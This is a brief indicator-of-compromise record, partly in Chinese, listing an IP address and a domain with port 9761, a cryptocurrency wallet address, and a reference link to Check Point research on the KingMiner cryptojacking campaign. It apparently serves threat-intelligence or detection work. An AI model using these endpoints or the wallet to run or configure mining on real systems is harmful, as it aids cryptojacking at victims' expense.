95.179.131.54:9761 w.homewrt.com:9761 钱包： 49EHNacRauzgz8cGouhrVChcLyF3XrGLAdWiczJxY1qpX3oed4cGgMUUHHhyR7taGJ1MtvpfJiDf9gugAko4MzXM9DRYzZ1 参考链接： https://research.checkpoint.com/2018/kingminer-the-new-and-improved-cryptojacker/